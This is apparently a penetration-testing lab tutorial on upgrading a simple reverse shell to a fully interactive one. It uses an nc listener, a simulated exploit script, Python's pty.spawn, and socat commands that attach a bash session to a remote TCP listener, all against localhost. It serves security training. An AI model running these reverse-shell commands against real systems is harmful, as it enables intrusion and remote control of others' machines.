In the field of penetration testing, gaining access to a target system often involves obtaining a shell, which can be a simple shell or an interactive shell. A simple shell is limited in functionality and lacks interactive capabilities, while an interactive shell provides a more robust and user-friendly environment. This lab aims to explore the differences between simple and interactive shells, and guide you through the process of upgrading a simple shell to an interactive shell.
In this step, we will explore the concept of a simple shell and its limitations. A simple shell is typically obtained through remote command execution vulnerabilities or other exploitation techniques. While it allows you to execute commands on the target system, it lacks several essential features that can hinder the post-exploitation phase.
To begin, open a terminal window and navigate to the /home/labex/project directory:
cd /home/labex/projectTo simulate the process of obtaining a simple shell on the target system, you need to set up a listener on port 5911 using the nc command:
nc -lnvp 5911Expected output:
labex:project/ $ nc -lnvp 5911
listening on [any] 5911 ...This terminal window will act as the listener for the simple shell connection.
Open another terminal window and navigate to the /home/labex/project directory and you should see an exploit.sh file in your home directory. This file simulates a remote command execution exploit that can be used to obtain a simple shell on the target system.
cd /home/labex/projectRun the exploit.sh script to connect to the listener on port 5911 and obtain a simple shell on the target system:
./exploit.shExpected output:
labex:project/ $ ./exploit.sh
Simulating attack...
Shell has been rebound, please check the terminal which you listen to the port 5911This script will connect to the listener on port 5911 and provide you with a simple shell on the target system.
Back in the terminal window where you set up the listener, you should see a connection established with the target system.
Example output:
labex:project/ $ nc -lnvp 5911
listening on [any] 5911 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 38696
|You can verify that you have obtained a simple shell by executing commands such as whoami and lsb_release -a. However, you will notice that the simple shell lacks certain features, such as proper command prompts, tab completion, and the ability to use interactive commands like su or ssh.
One way to upgrade a simple shell to an interactive shell is by using Python's pty module, which allows you to create a pseudo-terminal (pts).
First, check if Python is installed on the target system by running the following commands:
which pythonIf Python is available, you can create a pseudo-terminal using the following command:
python -c 'import pty; pty.spawn("/bin/bash");'This command will spawn a new interactive shell with pseudo-terminal support, allowing you to execute commands like su and ssh without any issues.
Example output:
labex:project/ $ python -c 'import pty; pty.spawn("/bin/bash");'
labex@660d6d4be229593d40db954d:~/project$You can verify that the new shell is a pseudo-terminal by running the tty command and redirecting the output to a file:
tty > /home/labex/project/shell.txtCheck the contents of the shell.txt file to see if the shell is a pseudo-terminal (pts).
cat /home/labex/project/shell.txtExample output:
labex@660d6d4be229593d40db954d:~/project$ /home/labex/project/shell.txt
/dev/pts/5However, while the Python pseudo-terminal addresses some limitations of the simple shell, it still lacks certain features like tab completion, history navigation, and proper support for text editors like vim or vi.
PS: You can logout from the pseudo-terminal shell by typing exit or pressing Ctrl+D.
For a more comprehensive solution, we can use the socat utility to obtain a full interactive shell with support for all features, including tab completion, history navigation, and text editor compatibility.
First, check if socat is installed on the target system by running the following command:
which socatIf socat is available, follow these steps:
Open a new terminal window and start a listener on port 5912 using the following socat command:
socat file:`tty`,raw,echo=0 tcp-listen:5912Waitting for the connection to be established.
In the simple shell, execute the following command to connect to the listener and upgrade the shell to a full interactive shell:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:127.0.0.1:5912Back in the terminal window where you set up the listener, you should see a connection established with the target system. You should now have a fully interactive shell with all the features you would expect from a regular terminal session.
Example output:
labex:project/ $ socat file:`tty`,raw,echo=0 tcp-listen:5912
labex@660d5d5ee229593d40db9301:~$Test the new interactive shell by using commands like cat, ssh, vim, and navigating through command history using the up and down arrow keys.
In this lab, we explored the concept of simple and interactive shells in the context of penetration testing. We learned about the limitations of simple shells and the importance of upgrading to an interactive shell for efficient post-exploitation activities. We covered two methods for upgrading a simple shell: using Python's pty module to create a pseudo-terminal, and using the socat utility to obtain a full interactive shell with all the necessary features. By practicing these techniques, you have gained valuable skills that will aid you in future penetration testing engagements, enabling you to overcome the challenges posed by simple shells and streamline your post-exploitation efforts.